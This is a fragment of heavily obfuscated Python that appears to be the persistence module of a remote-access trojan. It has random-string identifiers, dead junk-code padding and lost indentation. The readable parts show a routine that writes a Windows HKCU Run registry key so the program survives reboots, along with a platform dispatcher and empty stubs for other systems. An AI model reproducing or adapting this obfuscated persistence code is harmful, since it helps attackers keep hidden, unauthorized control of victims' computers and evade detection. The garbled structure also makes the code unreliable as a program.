KJKMtiAjCAedAsAiMFzgciIVzmWdeQFLxTxMBEPbWUeCudZcRscgaanjZjaCTOWqSDAthjqDkIlAZekqtHWTEBolTOhhIabSWlaBQMbROkuZVPhIjYNoBgPHPBDEkxwu = vfRZNARgPOxlbgAdlMTqPgfuCAosyrDsUaSFSmnkMIOzUbGLgiuGlkVVbjSkoWnUBMJZYBzBnVcMhRgrKmwqbCZpSeQIddoDEcmxsMkwiLyNLitlBmLDZeBmigyCIkdZ
if KJKMtiAjCAedAsAiMFzgciIVzmWdeQFLxTxMBEPbWUeCudZcRscgaanjZjaCTOWqSDAthjqDkIlAZekqtHWTEBolTOhhIabSWlaBQMbROkuZVPhIjYNoBgPHPBDEkxwu in vfRZNARgPOxlbgAdlMTqPgfuCAosyrDsUaSFSmnkMIOzUbGLgiuGlkVVbjSkoWnUBMJZYBzBnVcMhRgrKmwqbCZpSeQIddoDEcmxsMkwiLyNLitlBmLDZeBmigyCIkdZ:
vfRZNARgPOxlbgAdlMTqPgfuCAosyrDsUaSFSmnkMIOzUbGLgiuGlkVVbjSkoWnUBMJZYBzBnVcMhRgrKmwqbCZpSeQIddoDEcmxsMkwiLyNLitlBmLDZeBmigyCIkdZ = vVPccuVHBdpXVAfvMydBKAqVHSVncwkHoxdSZyPyxgbiFEwJwFDVTlVFIzvIEcTKeTpqrdxCAmQpjbopwYpNYfzkzQqzMeMQlCHQduxCJTgmnNUZrBEaDXQIPTLBvdVM
_winreg.CloseKey(WFIKqgbCnztsDtHohfvZNMDcKqDtOugqyVnPwCZCbNOlBfosZOtPVzyiJzFkxbxHAKXrKtGCZXfZDfDgwsIJdYhUzHlejUhnpfzQRfGkiXUlBTYhcfOpnlZcimgEvCOJ)
huUiebwntZjEBGytXJeCWJAEoSbcIAwldXZMxYlPnEEVdoUiwIixiWGLXPzEOxIXFzmShmjFdoUjBydBqfZoukMnhjqXVVNlxHpvbIhbppXFLZgqXKpdDbXbQFvUKHmA = 'sBeWiykBTgFygWcCwhPntTtEtFNYqIcECfQHNMTmYSMRMecMBjhxhsqyjnVZGskoamfWeSSnfVgxbGSeGsuaffDrtMfRLfmmAKYbSRqUFsfErLUvixqcKJgMwznSSyPV'
zSbLZzzKuElkEhJEniSqLVhZzNlOKghzrNyRqTcBytZlYKzAsVRsuNiFkcPOabtNXSHIUlxvkPrkJjOmjKBIRJpRxFyrhKZPOpIHLgQKXfbOsETlUPgOEVSRCKbpTMZo = 'mHcBKOulGxPhTEjlaXNfJPtjHdTTdOrRgMfvocWEfqPxOfTFevmjwFGPQlAtlcpndjLkYoTDPyKNgupJpeRamGbwkLQHtvtnTtATzICvIvzGZKxRgwVcIugQSEdwNieQ'
rDqWftIlZaSoPJpHalQToVOIxRcbUnuQtKlUwQnEXlQFHjMAgYoUikxhFbIuwmUdCkzQqjzrCYZagsIKBrULnkWxFwbLfTsoaapbaHNMdrAeZQfCQNvpSktJyVElcbFh = 'yVaGyMRYhbDPcdmVTRfduokNIvXRBvaVECCutQNRzJnWJGMmapjDKhUMfyHDaWpYUoKzjYkAnVHodyRIgvikBzYiwwQKHpSJIbXLdjubCkqUQiVgZzrbZQzbloxUSiuz'
PewFbvbRwEftQTjHhqKHvclUoglVACkGIkClhOSZbrlIUxzttbujECeJkoDrVodSZHYFdkujEDYpqOonwaZTeaWdkfhoPFSqcTeWTYqNjafhSYTnoyixFhybazqvsQFh = 'TfAUmHgvUvCQZiNARuqpQzbjQZNNLzlwnPDgDKYXhTrqosQOaigkJOgObKDCMdQEqfzAJWYIHayfXDbCadaJeBbExcdwmlTqGqwIAqCYDoVdzjoQZBPKUGeZKbtqWLcU'
ECzASGoDSIKcjHzmlVVjmzLWToDgVdNwIHIhtvmAvpRdVUzolPQXCukgcCNTXnZlWoXZLLWZJjrGJPkwUEFcaOrUtJXaIlKoNycEtzZWJHJxkwzsxIcbinPspiaAjiqz = 'aRutSXfXTCJmPlUOzedzhYbEDDaaqJHsymdjqmhvKMLgflRBkkhMRKzrPPlCzRjTHpSWDhsEPzKRgsyBxCngunrCTYVhyYuveSOhzqvHCMENUyVMhZmynoQEwnzdCMTn'
eRcZMnGSBMmlqiIeddxSKJssfKCQzqWycDTnJUPbypaNBPbGVOQeFPpPtHDyMvFJVRFSiHdVTeXbaaqQTAaHTLWuqbvqtNHMdXXroiXroHqBxiRIjUbduiMJNHzwdjwK = 'uSlisUZtioVIJasYRoeLWdVpQUIoUGiPjUVQkIyuxRNywMNAxmgYEFvDTqAqqoxMaFAjFCmhOPSwnvDSnbGtnbGzgaJlszZiTDzWWRmMxHsFIoXBYMFVWueaRytsBZGB'
if huUiebwntZjEBGytXJeCWJAEoSbcIAwldXZMxYlPnEEVdoUiwIixiWGLXPzEOxIXFzmShmjFdoUjBydBqfZoukMnhjqXVVNlxHpvbIhbppXFLZgqXKpdDbXbQFvUKHmA != PewFbvbRwEftQTjHhqKHvclUoglVACkGIkClhOSZbrlIUxzttbujECeJkoDrVodSZHYFdkujEDYpqOonwaZTeaWdkfhoPFSqcTeWTYqNjafhSYTnoyixFhybazqvsQFh:
zSbLZzzKuElkEhJEniSqLVhZzNlOKghzrNyRqTcBytZlYKzAsVRsuNiFkcPOabtNXSHIUlxvkPrkJjOmjKBIRJpRxFyrhKZPOpIHLgQKXfbOsETlUPgOEVSRCKbpTMZo = rDqWftIlZaSoPJpHalQToVOIxRcbUnuQtKlUwQnEXlQFHjMAgYoUikxhFbIuwmUdCkzQqjzrCYZagsIKBrULnkWxFwbLfTsoaapbaHNMdrAeZQfCQNvpSktJyVElcbFh
for eRcZMnGSBMmlqiIeddxSKJssfKCQzqWycDTnJUPbypaNBPbGVOQeFPpPtHDyMvFJVRFSiHdVTeXbaaqQTAaHTLWuqbvqtNHMdXXroiXroHqBxiRIjUbduiMJNHzwdjwK in PewFbvbRwEftQTjHhqKHvclUoglVACkGIkClhOSZbrlIUxzttbujECeJkoDrVodSZHYFdkujEDYpqOonwaZTeaWdkfhoPFSqcTeWTYqNjafhSYTnoyixFhybazqvsQFh:
if eRcZMnGSBMmlqiIeddxSKJssfKCQzqWycDTnJUPbypaNBPbGVOQeFPpPtHDyMvFJVRFSiHdVTeXbaaqQTAaHTLWuqbvqtNHMdXXroiXroHqBxiRIjUbduiMJNHzwdjwK != rDqWftIlZaSoPJpHalQToVOIxRcbUnuQtKlUwQnEXlQFHjMAgYoUikxhFbIuwmUdCkzQqjzrCYZagsIKBrULnkWxFwbLfTsoaapbaHNMdrAeZQfCQNvpSktJyVElcbFh:
zSbLZzzKuElkEhJEniSqLVhZzNlOKghzrNyRqTcBytZlYKzAsVRsuNiFkcPOabtNXSHIUlxvkPrkJjOmjKBIRJpRxFyrhKZPOpIHLgQKXfbOsETlUPgOEVSRCKbpTMZo = zSbLZzzKuElkEhJEniSqLVhZzNlOKghzrNyRqTcBytZlYKzAsVRsuNiFkcPOabtNXSHIUlxvkPrkJjOmjKBIRJpRxFyrhKZPOpIHLgQKXfbOsETlUPgOEVSRCKbpTMZo
else:
ECzASGoDSIKcjHzmlVVjmzLWToDgVdNwIHIhtvmAvpRdVUzolPQXCukgcCNTXnZlWoXZLLWZJjrGJPkwUEFcaOrUtJXaIlKoNycEtzZWJHJxkwzsxIcbinPspiaAjiqz = huUiebwntZjEBGytXJeCWJAEoSbcIAwldXZMxYlPnEEVdoUiwIixiWGLXPzEOxIXFzmShmjFdoUjBydBqfZoukMnhjqXVVNlxHpvbIhbppXFLZgqXKpdDbXbQFvUKHmA
else:
rDqWftIlZaSoPJpHalQToVOIxRcbUnuQtKlUwQnEXlQFHjMAgYoUikxhFbIuwmUdCkzQqjzrCYZagsIKBrULnkWxFwbLfTsoaapbaHNMdrAeZQfCQNvpSktJyVElcbFh = huUiebwntZjEBGytXJeCWJAEoSbcIAwldXZMxYlPnEEVdoUiwIixiWGLXPzEOxIXFzmShmjFdoUjBydBqfZoukMnhjqXVVNlxHpvbIhbppXFLZgqXKpdDbXbQFvUKHmA
huUiebwntZjEBGytXJeCWJAEoSbcIAwldXZMxYlPnEEVdoUiwIixiWGLXPzEOxIXFzmShmjFdoUjBydBqfZoukMnhjqXVVNlxHpvbIhbppXFLZgqXKpdDbXbQFvUKHmA = ECzASGoDSIKcjHzmlVVjmzLWToDgVdNwIHIhtvmAvpRdVUzolPQXCukgcCNTXnZlWoXZLLWZJjrGJPkwUEFcaOrUtJXaIlKoNycEtzZWJHJxkwzsxIcbinPspiaAjiqz
if rDqWftIlZaSoPJpHalQToVOIxRcbUnuQtKlUwQnEXlQFHjMAgYoUikxhFbIuwmUdCkzQqjzrCYZagsIKBrULnkWxFwbLfTsoaapbaHNMdrAeZQfCQNvpSktJyVElcbFh == huUiebwntZjEBGytXJeCWJAEoSbcIAwldXZMxYlPnEEVdoUiwIixiWGLXPzEOxIXFzmShmjFdoUjBydBqfZoukMnhjqXVVNlxHpvbIhbppXFLZgqXKpdDbXbQFvUKHmA:
for eRcZMnGSBMmlqiIeddxSKJssfKCQzqWycDTnJUPbypaNBPbGVOQeFPpPtHDyMvFJVRFSiHdVTeXbaaqQTAaHTLWuqbvqtNHMdXXroiXroHqBxiRIjUbduiMJNHzwdjwK in huUiebwntZjEBGytXJeCWJAEoSbcIAwldXZMxYlPnEEVdoUiwIixiWGLXPzEOxIXFzmShmjFdoUjBydBqfZoukMnhjqXVVNlxHpvbIhbppXFLZgqXKpdDbXbQFvUKHmA:
if eRcZMnGSBMmlqiIeddxSKJssfKCQzqWycDTnJUPbypaNBPbGVOQeFPpPtHDyMvFJVRFSiHdVTeXbaaqQTAaHTLWuqbvqtNHMdXXroiXroHqBxiRIjUbduiMJNHzwdjwK == rDqWftIlZaSoPJpHalQToVOIxRcbUnuQtKlUwQnEXlQFHjMAgYoUikxhFbIuwmUdCkzQqjzrCYZagsIKBrULnkWxFwbLfTsoaapbaHNMdrAeZQfCQNvpSktJyVElcbFh:
rDqWftIlZaSoPJpHalQToVOIxRcbUnuQtKlUwQnEXlQFHjMAgYoUikxhFbIuwmUdCkzQqjzrCYZagsIKBrULnkWxFwbLfTsoaapbaHNMdrAeZQfCQNvpSktJyVElcbFh = huUiebwntZjEBGytXJeCWJAEoSbcIAwldXZMxYlPnEEVdoUiwIixiWGLXPzEOxIXFzmShmjFdoUjBydBqfZoukMnhjqXVVNlxHpvbIhbppXFLZgqXKpdDbXbQFvUKHmA
else:
rDqWftIlZaSoPJpHalQToVOIxRcbUnuQtKlUwQnEXlQFHjMAgYoUikxhFbIuwmUdCkzQqjzrCYZagsIKBrULnkWxFwbLfTsoaapbaHNMdrAeZQfCQNvpSktJyVElcbFh = ECzASGoDSIKcjHzmlVVjmzLWToDgVdNwIHIhtvmAvpRdVUzolPQXCukgcCNTXnZlWoXZLLWZJjrGJPkwUEFcaOrUtJXaIlKoNycEtzZWJHJxkwzsxIcbinPspiaAjiqz
return True, 'HKCU Run registry key applied'
except WindowsError:
qvBEGkSuZjZWFklMtdgIQQbLvvyYVJwNrvCWfSYFtDwVAxnzKfZklsxyEIpoRPOSvndLswbxSKKVlbzTlCkoPDGIqIlFpnkCTGOrjqnUdAgqnyvHAxFeOASgMNWrqpvW = 'SMJdMBySYWiaiLlYIZkyTeNBPWgqfqbenlXvTLAKOekCrdyEesQkseLzSADVCpREEwTqtznVdaIBrVoxchBtSwrNzjTlcwcDIWrSaaBNybtxJAklwxaNWpRURwyqvaDM'
cKRvdecIlNoEqkJGBDaCOUOBjqFWIxnGxnalLiqWNbFoiDepbsGVxkbvNFjytMUJNFowPUpCrXDpEeLbxlIWlZyxlEooPkkpcXNEMRxtNaQXIgzEpXyjisKgnnqXcClX = 'bGwqEDcnDYqRSaLQWdecghcXRuJcmSUtvvlsVlhTmSdtUCUaVuDMcTaAeGuzZpPetdhukdUIpJVWuwKYVQRpiSQnIHzxiOYCmCvIRWinDZOKnarrnYeBqOaxcJznIgMk'
ZxBnsuJslJSgSyZyVDLDKXEAiRERVoUzIRSPxQuDTlTFDparuDdmtjfRzRsobfMJoFkEzFLAjiDsVZZGRuokBRsXrVIeqIOfIXKPXDgCfywGHFkSpfICzMMoNsaIVfud = 'XqSWWyintqiBNMGEYRfGAWxsGmNrGyQHtsHJwXLgKxexXmHwuKkviftAFIAtldycHbcXajYHGuNuliFSyTuaGWbuWQdTHUzuhBJdAMlcDDwQONxacbgsQpzXGHCXJjrl'
PUhmnrlBsTpSglatZZADXdzJqBMTVWeEpBeRYgZBbLrAcRQGhsZwsWGpBgVQONXCPpSyfoxutYbbleDJKRdIMAzoJUhzxVRvzOapbpCkRcnwBaBvsubOpprjzHJDYECS = 'gitjdtGiEhjdNamIJMmLyHMqdOEJUGKJlxvOewOWKDMUcFQIZpnJSVtGPkcURHWjQivYKSPXMbAFNsKTShvBgDPMMwJAJNDvPnOwoTHNfOswcByfmIDktHFKluihGHmD'
oVMlYqVYTucdlFaQKWlGDArqwElnutYUuIjJwNnynRyfvRDQywARBbjzgaHzRPwTAlPnJIQijVXnAWQOvOhBEXKCnhzvGYjrYjduJqHKEMZERuFRHEzInhbLXDJqGhoQ = 'QcMaqVARPRvzpDlnckWixcAAizBnLFOPohPizMpXoEtdAXdZlNZdEeprBGMcNaLPTbtandpjMxmFSrTtCTEHpriNfasBHZRRZXBzDBqlYPMomKUvjRFhhFsEKebYWSRW'
if qvBEGkSuZjZWFklMtdgIQQbLvvyYVJwNrvCWfSYFtDwVAxnzKfZklsxyEIpoRPOSvndLswbxSKKVlbzTlCkoPDGIqIlFpnkCTGOrjqnUdAgqnyvHAxFeOASgMNWrqpvW in cKRvdecIlNoEqkJGBDaCOUOBjqFWIxnGxnalLiqWNbFoiDepbsGVxkbvNFjytMUJNFowPUpCrXDpEeLbxlIWlZyxlEooPkkpcXNEMRxtNaQXIgzEpXyjisKgnnqXcClX:
qvBEGkSuZjZWFklMtdgIQQbLvvyYVJwNrvCWfSYFtDwVAxnzKfZklsxyEIpoRPOSvndLswbxSKKVlbzTlCkoPDGIqIlFpnkCTGOrjqnUdAgqnyvHAxFeOASgMNWrqpvW = oVMlYqVYTucdlFaQKWlGDArqwElnutYUuIjJwNnynRyfvRDQywARBbjzgaHzRPwTAlPnJIQijVXnAWQOvOhBEXKCnhzvGYjrYjduJqHKEMZERuFRHEzInhbLXDJqGhoQ
if cKRvdecIlNoEqkJGBDaCOUOBjqFWIxnGxnalLiqWNbFoiDepbsGVxkbvNFjytMUJNFowPUpCrXDpEeLbxlIWlZyxlEooPkkpcXNEMRxtNaQXIgzEpXyjisKgnnqXcClX in ZxBnsuJslJSgSyZyVDLDKXEAiRERVoUzIRSPxQuDTlTFDparuDdmtjfRzRsobfMJoFkEzFLAjiDsVZZGRuokBRsXrVIeqIOfIXKPXDgCfywGHFkSpfICzMMoNsaIVfud:
cKRvdecIlNoEqkJGBDaCOUOBjqFWIxnGxnalLiqWNbFoiDepbsGVxkbvNFjytMUJNFowPUpCrXDpEeLbxlIWlZyxlEooPkkpcXNEMRxtNaQXIgzEpXyjisKgnnqXcClX = PUhmnrlBsTpSglatZZADXdzJqBMTVWeEpBeRYgZBbLrAcRQGhsZwsWGpBgVQONXCPpSyfoxutYbbleDJKRdIMAzoJUhzxVRvzOapbpCkRcnwBaBvsubOpprjzHJDYECS
elif cKRvdecIlNoEqkJGBDaCOUOBjqFWIxnGxnalLiqWNbFoiDepbsGVxkbvNFjytMUJNFowPUpCrXDpEeLbxlIWlZyxlEooPkkpcXNEMRxtNaQXIgzEpXyjisKgnnqXcClX in qvBEGkSuZjZWFklMtdgIQQbLvvyYVJwNrvCWfSYFtDwVAxnzKfZklsxyEIpoRPOSvndLswbxSKKVlbzTlCkoPDGIqIlFpnkCTGOrjqnUdAgqnyvHAxFeOASgMNWrqpvW:
ZxBnsuJslJSgSyZyVDLDKXEAiRERVoUzIRSPxQuDTlTFDparuDdmtjfRzRsobfMJoFkEzFLAjiDsVZZGRuokBRsXrVIeqIOfIXKPXDgCfywGHFkSpfICzMMoNsaIVfud = cKRvdecIlNoEqkJGBDaCOUOBjqFWIxnGxnalLiqWNbFoiDepbsGVxkbvNFjytMUJNFowPUpCrXDpEeLbxlIWlZyxlEooPkkpcXNEMRxtNaQXIgzEpXyjisKgnnqXcClX
if ZxBnsuJslJSgSyZyVDLDKXEAiRERVoUzIRSPxQuDTlTFDparuDdmtjfRzRsobfMJoFkEzFLAjiDsVZZGRuokBRsXrVIeqIOfIXKPXDgCfywGHFkSpfICzMMoNsaIVfud in cKRvdecIlNoEqkJGBDaCOUOBjqFWIxnGxnalLiqWNbFoiDepbsGVxkbvNFjytMUJNFowPUpCrXDpEeLbxlIWlZyxlEooPkkpcXNEMRxtNaQXIgzEpXyjisKgnnqXcClX:
cKRvdecIlNoEqkJGBDaCOUOBjqFWIxnGxnalLiqWNbFoiDepbsGVxkbvNFjytMUJNFowPUpCrXDpEeLbxlIWlZyxlEooPkkpcXNEMRxtNaQXIgzEpXyjisKgnnqXcClX = oVMlYqVYTucdlFaQKWlGDArqwElnutYUuIjJwNnynRyfvRDQywARBbjzgaHzRPwTAlPnJIQijVXnAWQOvOhBEXKCnhzvGYjrYjduJqHKEMZERuFRHEzInhbLXDJqGhoQ
return False, 'HKCU Run registry key failed'
def mvZhXEFKFfgNpNuuGltXFxzkQSecRsRXzlhAQkZglUYprNzQuQHQSeOSyDFiFpSxmwrSdhfQrzzCnTBtWVKKPEWhDTpWhAURMjXmlPYrdZFeLxLfRaSKTXiBjplrpOiC():
return False, 'nothing here yet'
def mYdssxnsmlAfvrSjolIFLdNSWdICTyEYmQJbnrImdVXGTLxpgMTBCjxQsBPIPCwxgCZxnmFTFjwtxPqutRQqsngShUqEoaiDLTvGJtxHpdekdgRxYrThxYRXvvNUnaav():
return False, 'nothing here yet'
def gYHndANEDekWfPfsRRfODgwVLodFkkIbgqmiFOiwQlaRrwJBQHSEUlgdVJLHFADyIzHqNfHdfSrwWltrXDsmiXMwywfbzrUtRTVhQyVUUWwekdxICNHHrUWuECSiIFIh(plat_type):
if plat_type.startswith('win'):
VJhOEGEZWhyOetfDcyDxunEgoXdLUHhwzAQcAHESknkiBVyWoYUSZQUNquFEaYKQOgakplXgYrjxejaRnvIPAYybGzgHjISFtiraPrFDtUDdgrTQpNobYSpQohJcDdFP = 'btCbFsOiqNUJluaPzhHZEwEHmdAbkUgxyujcPkNOernrIAzzuYjVMBjHzozzNMLlPzckwjccLcHRkrrThJxuySGaSNxWyiMuZzAXAoVYMMyidfGkXhAblPgupQVDswDa'
TAtRaliyAlWKxnlwKyRktkTzQpaKopzFBjFZKhHZgDTZrIDWtouritgxDgwgOzWgdiFzpcfNzqerPLfCNJoxbzVhdMeYoPjIMuigTWQWYdKXTfNqyLODlGLjLKKyjPNf = 'pGOXTcaMCSbhxaFuBwQwIpZKDLcskJazlFMECHYitlFHsjmXpsivNVkynlHtUJoiBCrbHQwpnwXGuexRvLYDIpAXQxpWngoOtGFQlECpNAbRfNktuYuBeaPtobdtmMNP'
if VJhOEGEZWhyOetfDcyDxunEgoXdLUHhwzAQcAHESknkiBVyWoYUSZQUNquFEaYKQOgakplXgYrjxejaRnvIPAYybGzgHjISFtiraPrFDtUDdgrTQpNobYSpQohJcDdFP != TAtRaliyAlWKxnlwKyRktkTzQpaKopzFBjFZKhHZgDTZrIDWtouritgxDgwgOzWgdiFzpcfNzqerPLfCNJoxbzVhdMeYoPjIMuigTWQWYdKXTfNqyLODlGLjLKKyjPNf:
qlIoYprazcgXgpgABdsydeTxXpOcZfCnCOxTIOSSZLrDhFAPWTHKvLajBIqcwmWDBSElOEFAjtphzaoCuGIWcuvrfAXwdvtfeOanrfRSwtOfUalLHbPKGctVJycrFThL = 'sNmHaVgukewBxomCavtRdktXeMuUyAcGFISSdYaYnsaiUeOptNbiAZeUYpvMNvLcMFcgEuKsvRLqXQCzUqJrZhAuiIwTxibgrfZMFdXUsbVvtGQVklmGToSbIndcJNmL'
gcsSruwvHQgqEmRrxPlKhSsjHlvPfPAJHMzhegbyWZZSyZeUPmRTyFZUOBvTmHVeFfTWeQUEDXNIcIoaNeNSymSvcAJyuIfynUKmDMBRDoBdplkvllTDmARWxVVhIoag = 'wypdmjLzDRElUKhvubtxIgRTdSBCbwhxTTWuUsYpZonDBTHHqbLMxVkGKvhgANgVBScYubKsglyuqNqjBmaPZAsYTsmSpQhdTYLIHDayEhBPPdozRzwkkxDQoMAqzjYd'
gcsSruwvHQgqEmRrxPlKhSsjHlvPfPAJHMzhegbyWZZSyZeUPmRTyFZUOBvTmHVeFfTWeQUEDXNIcIoaNeNSymSvcAJyuIfynUKmDMBRDoBdplkvllTDmARWxVVhIoag = qlIoYprazcgXgpgABdsydeTxXpOcZfCnCOxTIOSSZLrDhFAPWTHKvLajBIqcwmWDBSElOEFAjtphzaoCuGIWcuvrfAXwdvtfeOanrfRSwtOfUalLHbPKGctVJycrFThL
success, NmOtigRiHNqlJxVKDFTueXpfkXtrEaaUPWrloCdgxZSgFXKAkpwqEFZKhEisDwmOGhdbMqLBpwklXthMNHQCagqkJqLMhZRMWPtxhotCnCmKtNHKdctvtiloraUvKeOW = RxcRLAtmXlEHutqjsTqPDnbkoGVfDtXIqoCNheDOiobDwKjpnzKTxqnKEKMbaLOReulMrzvPDceQQiZeQjYNKdJhiFFsHWqWxIWcCFIvJkBzsCEEYJFqKIipJAIonbjW()
uMWVLqMwMEIAruWJEUtSljVfMuuTVcRuBMgpicxaaUJwLNcvWkuMGqKCGBrgdzOwsVTaJLVXlENblrAbjqGZEzUeyeuhxgKZOqQSXfVmJgprIaqqmMYAmuIdLbxEyxAf = 'OjaHnwKEIqThKiBVheltLvmLvFMAmqyymHzcTxyRzunDcilUDqaaPQkvpgueAzJOXJkoAVLtyWETcoezvZTAsBVhJDPVdbhvXqdWWKFgPMcSAvJSuVFOlIPGjokYoPoH'
iuuMrdblXuvyRrpKcCnNzjcfPKNjLsdRQFTQZCZtNXvxmikyxyRatZPZhlWbITyLbjjIvFnZpImxoUfQYKTrWimmXUsFJnsMkvpVwztmTbqKjkmhgvndWWMPiqrJdmPe = 'DNWfbKZDAYJoGVlMmZuAcKcOkWoosgjiPWBWyYUitKrOJDoNjEqxJRldchlgMhFBamKLGhHbQQjfQpomcgqwfRqymzfmlgQjCGXnukswrFnHpDroIuvCTsJSAjOmKeTL'
VtwAwaPjYFSomYZGLwlCXzWeCuLTieNmTIqyrFQvjasHXTvYCQGlDWJvIXPLdeQKpmiNDgGSWlJEowDKfBqBDzHASKAsWnGlOojvLmcpSrvTFjWNsGxBlfGTZcMwsxZH = 'kSUyoYypYnIYxiSlhROAgrPgwcxhPOvBKGotMczeIssFncLwjWlApgJxBEMnpCTKGoZPRZCzruCDWcpqWnByKACSCRCNpdXtzafoRAPRHVpPFaEVohvQSmmMIkKZMzgS'
DWQVzfGIkuMakqLVUJtYiLEIuyOmBfgKRSSbOTHtXDURCuYweyaHhUdSiwCzRyUnqZUfDTmJOSvsyHrhYcvVdOuvONUglcVsmYxZwDHiVVzwYoSBnJuiEZAMkZoWUutO = 'AnGeHaZRGpKbYInBYVmNeBUjykhzUEyGpNiniDpkGXaYqrQBVMxylLLlNLuOGLmRHwnsmdNGSYRdlnAoCFKLQQUZbbyvPmFmQNbnaIjtNxhMcFQTsoDpMFaZAKQikHTb'
lBKVzUszcgwhOmNyGAJaJvbaNwLaARswRgKbZfGoDrlkTuIPWcmipJjOnXfIUBVyOcTnadPGdkKIwEyVNfuaBKZlNJZojxRbfhIbmqtMgwUyfIwivwmVvElnblGYhNVb = 'iypWDEQTcOorcsmtuenCDoFLsqPJmsYOxrZbksScdFWvCZivxoQjRdOSqwVLtJlZqIstFNYAoaSaqptjZpLiLxuPVoKqyARGqbQoiKreZxqXQQiMVAWuRqYZBGbOBKIX'
HleUzkOPzNjWMRWuvlbNetDTjGWGPuipaluggoWxfjHkvGVVYjBbVmwwdVmlanRFfohXMRvynDsWMlcwcwhHbfZCitJGHpPgxEIOiGlUpjAmyvYwrhgHLuxLvdznwSyE = 'XMzPYySZbbjCBteVWaLwHpfvNLCofqttotVMcZPmNMOsavWTPAHneLoexrKBPXnbDKGbcFPPEfuokAkfEpXmhWNOqIehUKkinAiIrVSeBbLCqccyZgfQykNlConHiOeU'
if uMWVLqMwMEIAruWJEUtSljVfMuuTVcRuBMgpicxaaUJwLNcvWkuMGqKCGBrgdzOwsVTaJLVXlENblrAbjqGZEzUeyeuhxgKZOqQSXfVmJgprIaqqmMYAmuIdLbxEyxAf != DWQVzfGIkuMakqLVUJtYiLEIuyOmBfgKRSSbOTHtXDURCuYweyaHhUdSiwCzRyUnqZUfDTmJOSvsyHrhYcvVdOuvONUglcVsmYxZwDHiVVzwYoSBnJuiEZAMkZoWUutO:
iuuMrdblXuvyRrpKcCnNzjcfPKNjLsdRQFTQZCZtNXvxmikyxyRatZPZhlWbITyLbjjIvFnZpImxoUfQYKTrWimmXUsFJnsMkvpVwztmTbqKjkmhgvndWWMPiqrJdmPe = VtwAwaPjYFSomYZGLwlCXzWeCuLTieNmTIqyrFQvjasHXTvYCQGlDWJvIXPLdeQKpmiNDgGSWlJEowDKfBqBDzHASKAsWnGlOojvLmcpSrvTFjWNsGxBlfGTZcMwsxZH
for HleUzkOPzNjWMRWuvlbNetDTjGWGPuipaluggoWxfjHkvGVVYjBbVmwwdVmlanRFfohXMRvynDsWMlcwcwhHbfZCitJGHpPgxEIOiGlUpjAmyvYwrhgHLuxLvdznwSyE in DWQVzfGIkuMakqLVUJtYiLEIuyOmBfgKRSSbOTHtXDURCuYweyaHhUdSiwCzRyUnqZUfDTmJOSvsyHrhYcvVdOuvONUglcVsmYxZwDHiVVzwYoSBnJuiEZAMkZoWUutO:
if HleUzkOPzNjWMRWuvlbNetDTjGWGPuipaluggoWxfjHkvGVVYjBbVmwwdVmlanRFfohXMRvynDsWMlcwcwhHbfZCitJGHpPgxEIOiGlUpjAmyvYwrhgHLuxLvdznwSyE != VtwAwaPjYFSomYZGLwlCXzWeCuLTieNmTIqyrFQvjasHXTvYCQGlDWJvIXPLdeQKpmiNDgGSWlJEowDKfBqBDzHASKAsWnGlOojvLmcpSrvTFjWNsGxBlfGTZcMwsxZH:
iuuMrdblXuvyRrpKcCnNzjcfPKNjLsdRQFTQZCZtNXvxmikyxyRatZPZhlWbITyLbjjIvFnZpImxoUfQYKTrWimmXUsFJnsMkvpVwztmTbqKjkmhgvndWWMPiqrJdmPe = iuuMrdblXuvyRrpKcCnNzjcfPKNjLsdRQFTQZCZtNXvxmikyxyRatZPZhlWbITyLbjjIvFnZpImxoUfQYKTrWimmXUsFJnsMkvpVwztmTbqKjkmhgvndWWMPiqrJdmPe
else:
lBKVzUszcgwhOmNyGAJaJvbaNwLaARswRgKbZfGoDrlkTuIPWcmipJjOnXfIUBVyOcTnadPGdkKIwEyVNfuaBKZlNJZojxRbfhIbmqtMgwUyfIwivwmVvElnblGYhNVb = uMWVLqMwMEIAruWJEUtSljVfMuuTVcRuBMgpicxaaUJwLNcvWkuMGqKCGBrgdzOwsVTaJLVXlENblrAbjqGZEzUeyeuhxgKZOqQSXfVmJgprIaqqmMYAmuIdLbxEyxAf
else:
VtwAwaPjYFSomYZGLwlCXzWeCuLTieNmTIqyrFQvjasHXTvYCQGlDWJvIXPLdeQKpmiNDgGSWlJEowDKfBqBDzHASKAsWnGlOojvLmcpSrvTFjWNsGxBlfGTZcMwsxZH = uMWVLqMwMEIAruWJEUtSljVfMuuTVcRuBMgpicxaaUJwLNcvWkuMGqKCGBrgdzOwsVTaJLVXlENblrAbjqGZEzUeyeuhxgKZOqQSXfVmJgprIaqqmMYAmuIdLbxEyxAf
uMWVLqMwMEIAruWJEUtSljVfMuuTVcRuBMgpicxaaUJwLNcvWkuMGqKCGBrgdzOwsVTaJLVXlENblrAbjqGZEzUeyeuhxgKZOqQSXfVmJgprIaqqmMYAmuIdLbxEyxAf = lBKVzUszcgwhOmNyGAJaJvbaNwLaARswRgKbZfGoDrlkTuIPWcmipJjOnXfIUBVyOcTnadPGdkKIwEyVNfuaBKZlNJZojxRbfhIbmqtMgwUyfIwivwmVvElnblGYhNVb
if VtwAwaPjYFSomYZGLwlCXzWeCuLTieNmTIqyrFQvjasHXTvYCQGlDWJvIXPLdeQKpmiNDgGSWlJEowDKfBqBDzHASKAsWnGlOojvLmcpSrvTFjWNsGxBlfGTZcMwsxZH == uMWVLqMwMEIAruWJEUtSljVfMuuTVcRuBMgpicxaaUJwLNcvWkuMGqKCGBrgdzOwsVTaJLVXlENblrAbjqGZEzUeyeuhxgKZOqQSXfVmJgprIaqqmMYAmuIdLbxEyxAf:
for HleUzkOPzNjWMRWuvlbNetDTjGWGPuipaluggoWxfjHkvGVVYjBbVmwwdVmlanRFfohXMRvynDsWMlcwcwhHbfZCitJGHpPgxEIOiGlUpjAmyvYwrhgHLuxLvdznwSyE in uMWVLqMwMEIAruWJEUtSljVfMuuTVcRuBMgpicxaaUJwLNcvWkuMGqKCGBrgdzOwsVTaJLVXlENblrAbjqGZEzUeyeuhxgKZOqQSXfVmJgprIaqqmMYAmuIdLbxEyxAf:
if HleUzkOPzNjWMRWuvlbNetDTjGWGPuipaluggoWxfjHkvGVVYjBbVmwwdVmlanRFfohXMRvynDsWMlcwcwhHbfZCitJGHpPgxEIOiGlUpjAmyvYwrhgHLuxLvdznwSyE == VtwAwaPjYFSomYZGLwlCXzWeCuLTieNmTIqyrFQvjasHXTvYCQGlDWJvIXPLdeQKpmiNDgGSWlJEowDKfBqBDzHASKAsWnGlOojvLmcpSrvTFjWNsGxBlfGTZcMwsxZH:
